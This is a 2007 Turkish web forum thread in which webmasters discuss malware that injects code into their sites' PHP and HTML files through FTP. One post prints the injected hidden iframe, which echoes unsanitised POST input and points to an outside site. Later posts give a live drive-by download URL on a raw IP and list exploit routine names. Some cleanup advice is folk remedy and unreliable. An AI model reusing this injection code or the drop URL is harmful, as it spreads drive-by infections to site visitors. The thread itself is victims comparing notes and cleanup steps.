Önceki başlık :: Sonraki başlık |
Yazar |
Mesaj |
polibo06 Site Yöneticisi
Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim
|
Tarih: 2007-06-05, 18:27:59 Mesaj konusu: |
|
|
bu konuda azıcıkta olsa biraz araştırma yaptım...esasen virüs elime geçmedi...geçseydi daha iyi inceleme fırsatı bulaaktım siz her yerde var diyorsunuz ben bulamıyorum :)
bilgisayarınıza gelen 2007 model sanırım antivirüsler güncellemesi yapılmamışsa tanımıyor.ancak bu virüs sayılmaz....bir kaç kşinin reklam amaçlı yazdığı casus yazılım demek daha uygun....
pc gelip yerleşiyor...bilgisayarınıza zarar vermiyor eğer ftp bağlanılırsa...kendini ftp yamalıyor.... burada index.php index.html index. asp gibi index kelimesine odaklanıyor.kendini indexin içine ekliyor...bunu siz ftp online olduğunuz zaman yapıyor...
sitenize gelen birinin bilgisayarına inmiyor...amacı sitenizin indexinide değiştirmek değil...sadece sizin siteniz sayesinde reklam yapmak...
ancak bunu yapanları tebrik etmek gerekiyor çünkü....düşünseinize bunu yapnalar index içindeki kodların tamamını değiştirebilirde...o zaman bir günde ne kadar siteyi hacklemiş olacaklardı... |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-06-17, 06:49:45 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-05, 18:38:07 Mesaj konusu: |
|
|
:)
olay arastırdıgın kadar basit değil. sadece index lere değil bir çok dosyaya giriyor, bekledikcede artıyor.
2.cisi firefoxdan giriş yapanlar siteye girdiği zaman pencereleri kapanıyor, explorerden giriş yapanların bilgisayarını kilitliyor.
gördüklerim bunlar benim |
|
Başa dön |
|
|
polibo06 Site Yöneticisi
Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim
|
Tarih: 2007-06-05, 18:40:35 Mesaj konusu: |
|
|
ben senin sitende dahil bu virüsü barındırıyor denilen bir çok siteye girdim...hiç bir şey olmadı....
arka planda bile çalışan bir şey yok...sayfalardan pc gelen bir yazılımda yok....
:S ? |
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-05, 18:43:15 Mesaj konusu: |
|
|
işte işin ilginc tarafı da o.
mesela bende dediklerim oluyor, aynı şekilde birkaç arkadaştada aynı şey oluyor.
ama mesela BAFRALI sitede rahatlıkla dolasıyordu, tabi site varken |
|
Başa dön |
|
|
polibo06 Site Yöneticisi
Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim
|
Tarih: 2007-06-05, 18:56:23 Mesaj konusu: |
|
|
eee o zaman bu ne biçim virüs?
ip gçöre torpil mi geçiyor?
inan şu anda bende bocaladım..bu kodu yazanla tanışmak isterdim...ancak böyle bir şeyin olma ihtimali milyonda bir gibi bir şey...neden dersen..kişiye göre davranmak mantık ister...
yok pc güvenliği ile alakalı dersen...bilgisayarımda hiç bir güvenlik programı yok..service pack 1
tek program var..internet portlarını takp ediyorum sadece.giren ve çıkanları...buda bana yetiyor..kesinlikle senin veya senin gibi olduğunu idaa edenlerden benim pcye bir yazılım gelmedi...bence virüs http:// portunu değilde ftp portunu kullanıyor...
sende neden öyle oldu..belki virüsün ana kaynağı senin pcde olduğu içindir..bilmem? |
|
Başa dön |
|
|
mavisce Editör
Kayıt: Nov 18, 2005 Mesajlar: 943 Konum: Trabzon/izmir 61-35
|
Tarih: 2007-06-05, 19:01:41 Mesaj konusu: |
|
|
başlıgı okuyunca bi bakayım dedim ftp ye ne göreyim :) virüs değil sadece anasayfa index.php sinde buda bizim türk virüslerinden bazı adi heriflerin yapdıgı birşey bu nasıl yapılıyor peki onu söyliyeyim gelip netopsiyona veya herhangi bir nukedestek sitesine 76.32 bilmem ne diye bi sürüm hazırlayıp index php sinin içine i f r a m e koyup piyasaya yayıyor buda bizim türk kurnazlarının magrifetleri
adreside bu güzel kulaklarını cınlattım onu söyliyebilirim fazlasıyla küfürü haketmiş bunu koyan adi herif
Kod:
|
<i f r a m e src="http://www.seslicanlar.com?url=<? echo $_POST['url'] ?>" width="1" height="1"
overflow: none frameborder="0">
<a href="http://www.seslicanlar.com?url=<? echo $_POST['url'] ?>">the related document.</a>]
</i f r a m e>
|
|
|
Başa dön |
|
|
PhP_CoDeR Mesaj: 200+
Kayıt: Oct 28, 2003 Mesajlar: 299
|
Tarih: 2007-06-05, 19:17:17 Mesaj konusu: |
|
|
Bugün Yavuzun sitesinde karşılaştığım bir olay bana httpden saldırı olabilir ihtimalini gösterdi. Kendi yazdığım bir koruma scriptini yavuzun sitesine kurdum. aradan biraz zaman geçti bir de baktım 4 saldırı ard arda oldu. Buna Yavuz da şahit. Bu arada belirtmeliyim ki bu şey her neyse sadece indexlere bulaşmıyor.
/httpdocs/includes/ps_upload/index.html
/httpdocs/includes/auth.php
gibi dosyalara da bulaşıyor. + Ben sitedeyken de hiçbişey olmadı. Etkisiz kalıyordu. Ama aynı zamanda başkalarında da etkisini göstermesi söz konusu. Konuyu iyice araştırmak lazım... |
|
Başa dön |
|
|
Sercan Mesaj: 1000+
Kayıt: Jan 07, 2006 Mesajlar: 1719 Konum: İstanbuL //
|
Tarih: 2007-06-05, 19:36:33 Mesaj konusu: |
|
|
.html .asp .php gibi dosyalara otomatik yazıyor diye hatırlıyorum yani ftpye girerse her dosyaya bulaşır. |
|
Başa dön |
|
|
Bu Site Google Adsense ile Gelir Elde Ediyor
|
Tarih: 2024-06-17, 06:49:45 Mesaj konusu: Forum Arası Reklamlar |
|
|
|
|
Başa dön |
|
|
polibo06 Site Yöneticisi
Kayıt: Nov 01, 2006 Mesajlar: 2412 Konum: izmirimi özledim
|
Tarih: 2007-06-05, 21:16:20 Mesaj konusu: |
|
|
PhP_CoDeR :
|
Bugün Yavuzun sitesinde karşılaştığım bir olay bana httpden saldırı olabilir ihtimalini gösterdi. Kendi yazdığım bir koruma scriptini yavuzun sitesine kurdum. aradan biraz zaman geçti bir de baktım 4 saldırı ard arda oldu. Buna Yavuz da şahit. Bu arada belirtmeliyim ki bu şey her neyse sadece indexlere bulaşmıyor.
/httpdocs/includes/ps_upload/index.html
/httpdocs/includes/auth.php
gibi dosyalara da bulaşıyor. + Ben sitedeyken de hiçbişey olmadı. Etkisiz kalıyordu. Ama aynı zamanda başkalarında da etkisini göstermesi söz konusu. Konuyu iyice araştırmak lazım...
|
http den saldırı dediğinde...hacker http://..... yazarak sitenin kodunu mu değşiyor?
yoksa http:// ile bağlanan herhangi birinin pc bu virüsün girebileceği mi?
includes/ps_upload/index.html
sonuçta buda index...
ancak auth.php de kendisini atması ilginç...
arkadaşlar bu virüs bilgisayarında olan yok mu? gizli kod olduğunu sanmıyorum.muhakkak açıp.kodlara bakabiliriz.böyle bir fırsatı olan arkadaşlar kodu bizimle paylaşırsa bu virüse karşı tedbir almak daha kolaylaşır diye düşünüyorum...
önce düşmanımızı tanımalıyız....eğer sizin dediğiniz gibi durdurulamayan,engellenemeyen bir virüs ise....*YASAK KELİME** bakılması ve incelenmesi gerekior ama ben böyle bir kodla karşılaşmadım.şu anda bir çok sitenin teknik işleri ile uğraşıyorum ama görmedim...hepsine tek tek baktım..aklımı çok karıştırdığı için.ki bu baktığım sitelerin webmasterlarının bazılar pekte pc konusunda uzman değil...güvenliklerini koruyamazlar...
o halde bu virüsün bu muhakkak bir zayıf noktası var ve açığıda var... |
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-05, 22:40:01 Mesaj konusu: |
|
|
arkadaşım gargara dan za zor temizledim. indexlere değil tüm php dosyalarına giriyor. hatta forum tpl dosyalarına ve hatta forum archive dosyasına bile girmiş
şu anda sorun yok ama ftp ye girmiyorum işimi panelden görüyorum.
www.ispirim.org burada her tarafa dolmus virüs.cogu bölümde kaynaktan bakabilirsiniz. ama insallah bununda üstesinden gelecem. |
|
Başa dön |
|
|
maviay_67 Mesaj: 500+
Kayıt: Jan 01, 2005 Mesajlar: 580 Konum: istanbul
|
Tarih: 2007-06-05, 23:13:17 Mesaj konusu: |
|
|
bu ne ya birkaç arkadaşın sitesine bakıyorum http://81.95.149.28/logo/index.php antivürüs cıyaklamaya başlıyor arkadaşlar bo kod dosyaların neresinde ? |
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-06, 00:16:58 Mesaj konusu: |
|
|
www.ispirim.org/index.htm kaynaktan bak <body den sonra eklemiş. ama php dosyalarında ?> den sonra ekliyor |
|
Başa dön |
|
|
melik Mesaj: 500+
Kayıt: Sep 06, 2005 Mesajlar: 944 Konum: Elazığ/Kovancılar
|
Tarih: 2007-06-06, 01:09:03 Mesaj konusu: |
|
|
Ayrıca arkadaşlar bu virüs sadece alta atmıyor üste bi yerlerde atıyor ve hatta eğer html kodlarda açık çok ise dosyayı tamane değiştirebiliyor bilginiz olsun.. |
|
Başa dön |
|
|
BAFRALI Forum Yöneticisi
Kayıt: Mar 16, 2006 Mesajlar: 1640 Konum: Bende Bilmiyorum !
|
Tarih: 2007-06-06, 01:23:37 Mesaj konusu: |
|
|
Herkes virüsden bahsediyor peki bunu yok etmenin yada yakalnmamanın bi yolu yok mu ? |
|
Başa dön |
|
|
artistbaron Mesaj: 1000+
Kayıt: Dec 09, 2006 Mesajlar: 2993
|
Tarih: 2007-06-06, 01:36:39 Mesaj konusu: |
|
|
heh ıste bak en bastan berı bunu dıyorum yaw care yok mu |
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-06, 01:41:38 Mesaj konusu: |
|
|
cem uzana mı sorsak |
|
Başa dön |
|
|
melik Mesaj: 500+
Kayıt: Sep 06, 2005 Mesajlar: 944 Konum: Elazığ/Kovancılar
|
Tarih: 2007-06-06, 01:44:48 Mesaj konusu: |
|
|
Tek çaresi bilgisayarınızı virüsten iyice koruma bende 4 tane antivirüs + deepfreeze var ve ayrıca ftp yede program ile değil ftp.siteadi.com diyerek explorerden giriyorum en güveniliri bu program kullanınca diğer hostlara girmeseniz bile kendisi giriyor ona göre.. Dediğim gibi pcnizi koruyun ve ftp programı kullanmayın hiç değilse bu virüs olayı biraz düşene kadar kaç ay sürerse artık.. |
|
Başa dön |
|
|
artistbaron Mesaj: 1000+
Kayıt: Dec 09, 2006 Mesajlar: 2993
|
Tarih: 2007-06-06, 02:14:16 Mesaj konusu: |
|
|
e progam olmassa bıseyı cok gec atıyor ıster bılgısayarın5 gb ram olsun yıne gec atıyor |
|
Başa dön |
|
|
melik Mesaj: 500+
Kayıt: Sep 06, 2005 Mesajlar: 944 Konum: Elazığ/Kovancılar
|
Tarih: 2007-06-06, 02:18:13 Mesaj konusu: |
|
|
Bağlantı hızın iyise sorun olmuyor artist ha senin başına gelmedi diye böyle rahat konuşuyorsun bide başına gelenlere sor bu program işini gör bak onlar ne diyor.. Valla 3 km öteye kaçarlar ftp programından.. |
|
Başa dön |
|
|
ultrAslanYavuz Tema Sorumlusu
Kayıt: Jun 25, 2006 Mesajlar: 1217
|
Tarih: 2007-06-06, 02:19:50 Mesaj konusu: |
|
|
şekil A (ben) tüm ftp programlarımı kaldırdım |
|
Başa dön |
|
|
artistbaron Mesaj: 1000+
Kayıt: Dec 09, 2006 Mesajlar: 2993
|
Tarih: 2007-06-06, 03:17:00 Mesaj konusu: |
|
|
yavuzbey :
|
cem uzana mı sorsak
|
yaw bunu sonradan gordum krıze gırdım ona oy verek dıyek bıze hostıng şirketı kurar
ya bı soyle eklentı gıbı bısey yok mu tum dosyalara sıfremı koyak cpanelden yaw harbı cozumu yok mu progrm kullanmayak yanı |
|
Başa dön |
|
|
become_endless Mesaj: 100+
Kayıt: Jun 15, 2006 Mesajlar: 125 Konum: Trabzon
|
Tarih: 2007-06-06, 04:12:45 Mesaj konusu: Re: Sitenize virüs bulaşmış olabilir!.. |
|
|
Arkadaşlar Bu olaydan en feçi nasipini alan benım galiba amatormp3.net siniftakal.net amatorsesler.com dussokagi.net aytasweb.com ve bir kaç tane daha sitelerime bu bela olan kod bulaştı... bunun yüzünden pc ye 4 defa format attım.. şuan tüm sitelerimdeki dosyları sildim yedeklerimi atıyorum.. http://81.95.149.28/logo/index.php burdan ntos.exe diye bir dosya atılıyor bu dosya modem ayarlarınızı bozarak sitelere girmeyi engelliyor.. bu silinmiyor tek çaresi format.. (Bi yerden edindiğim bilgi üzerine eğer bilgisayarınıza bulaşmışsa ve bilgisayarınız üzerinden ftp ye bağlanıyorsanız o ftpdeki dosyalarada bulaşıyormuş) Dosyalarımı yeniliyorum.. ardından tekrar sitelere giriyorum o kod yine eklenmiş.. nası kurtulacam ben bundan Allam ya... |
|
Başa dön |
|
|
melik Mesaj: 500+
Kayıt: Sep 06, 2005 Mesajlar: 944 Konum: Elazığ/Kovancılar
|
Tarih: 2007-06-06, 05:20:12 Mesaj konusu: |
|
|
Kardeş aynen dediğin gibi yanlız şu linki kaldır yada araya boşluk koy biri tıklar falan başı belaya girer + aynen bizim dediğimiz olay bu eğer bundan önceki cevaplarımızı okursan rahat atlatırsın bu olayı + 17 siteme bulaştı benim 3 haftadır adam gibi yatamadım senin 5 -6 site olmuş çok mu.. çok şükür yeni yeni atlatıyorum başımız sağolsun arkadaşlar virüs ölmeye başladı.. |
|
Başa dön |
|
|
PhP_CoDeR Mesaj: 200+
Kayıt: Oct 28, 2003 Mesajlar: 299
|
Tarih: 2007-06-06, 11:58:09 Mesaj konusu: |
|
|
Arkadaşlar nihayet virüsü biraz çözebildim... Mahkeme ile virüsün bulunduğu sunucuya erişimi de durduracağız + Virüsün kodlarını antivirüs firmaların tümüne gönderdim onlar da en kısa zamanda korumasını yapacaklardır.
startWVF + startWinZip + startOverflow + GetRandString + CreateObject + XMLHttpDownload ve daha birçok kod kullanarak file.exe adındaki dosyayı çalıştırarak sisteme yerleşiyor ve zarar veriyor... Her neyse sizi gelişmelerden haberdar edeceğim. Umarım bu virüsün üstesinden geleceğiz... |
|
Başa dön |
|
|
Sercan Mesaj: 1000+
Kayıt: Jan 07, 2006 Mesajlar: 1719 Konum: İstanbuL //
|
Tarih: 2007-06-06, 12:56:07 Mesaj konusu: |
|
|
bende muhurgozlum.com/archive ye girdim bir baktım sayfa kapandı yenidenaöçtım kaynaktan baktım o adres duruyordu şimdi bana virüs bulaşmış mıdır ? .php .html dosyalara bakıyorum o i f r a m e yok.
norton yüklicem şimdi |
|
Başa dön |
|
|
|